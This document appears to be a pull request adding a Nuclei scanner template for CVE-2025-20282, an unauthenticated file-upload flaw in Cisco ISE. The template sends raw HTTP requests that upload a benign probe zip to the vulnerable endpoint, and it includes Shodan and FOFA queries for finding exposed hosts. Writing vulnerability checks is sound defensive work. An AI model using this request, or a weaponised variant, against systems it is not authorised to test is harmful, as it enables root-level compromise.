### PR TITLE
Add CVE-2025-20282.yaml - Cisco ISE < 3.4P2 - Unauthenticated Arbitrary File Upload

### DIFF
--- a/http/cves/2025/CVE-2025-20282.yaml
+++ b/http/cves/2025/CVE-2025-20282.yaml
@@ -1,0 +1,70 @@
+id: CVE-2025-20282
+
+info:
+  name: Cisco ISE < 3.4P2 - Unauthenticated Arbitrary File Upload
+  author: 0x_Akoko,pdteam
+  severity: critical
+  description: |
+    Cisco ISE and Cisco ISE-PIC contain an unrestricted file upload vulnerability caused by lack of file validation in an internal API, letting unauthenticated remote attackers upload and execute files as root, exploit requires crafted file upload.
+  impact: |
+    Unauthenticated attackers can upload and execute arbitrary files as root, leading to full system compromise.
+  remediation: |
+    Update to the latest Cisco ISE and Cisco ISE-PIC versions with security patches.
+  reference:
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
+    - https://riversecurity.eu/like-stealing-cisco-ise-cream-from-a-kid-weaponizing-a-cve/
+    - https://github.com/skadevare/CiscoISE-CVE-2025-20282-POC
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-20282
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-20282
+    cwe-id: CWE-434
+    epss-score: 0.112
+    epss-percentile: 0.955
+    cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: cisco
+    product: identity_services_engine
+    shodan-query: '"Set-Cookie: APPSESSIONID=" "Path=/admin"'
+    fofa-query: title="identity services engine"
+  tags: cve,cve2025,cisco,cisco-ise,rce,file-upload,intrusive,kev,vkev
+
+variables:
+  probe_zip: "{{base64_decode('UEsDBBQAAAAAAHcdA12wBb+DFAAAABQAAAAJAAAAcHJvYmUudHh0Q1ZFLTIwMjUtMjAyODItcHJvYmVQSwECFAMUAAAAAAB3HQNdsAW/gxQAAAAUAAAACQAAAAAAAAAAAAAAgAEAAAAAcHJvYmUudHh0UEsFBgAAAAABAAEANwAAADsAAAAAAA==')}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /admin/login.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(header, "APPSESSIONID=")'
+        internal: true
+
+  - raw:
+      - |
+        POST /admin/files-upload/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----ISEProbe202520282
+
+        ------ISEProbe202520282
+        Content-Disposition: form-data; name="file"; filename="probe.zip"
+        Content-Type: application/zip
+
+        {{probe_zip}}
+        ------ISEProbe202520282--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || status_code == 422'
+          - 'contains(header, "walkme.com")'
+        condition: and


### PR DESCRIPTION
Added CVE-2025-20282 for Cisco ISE unauthenticated file upload vulnerability with details on impact, remediation, and references.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
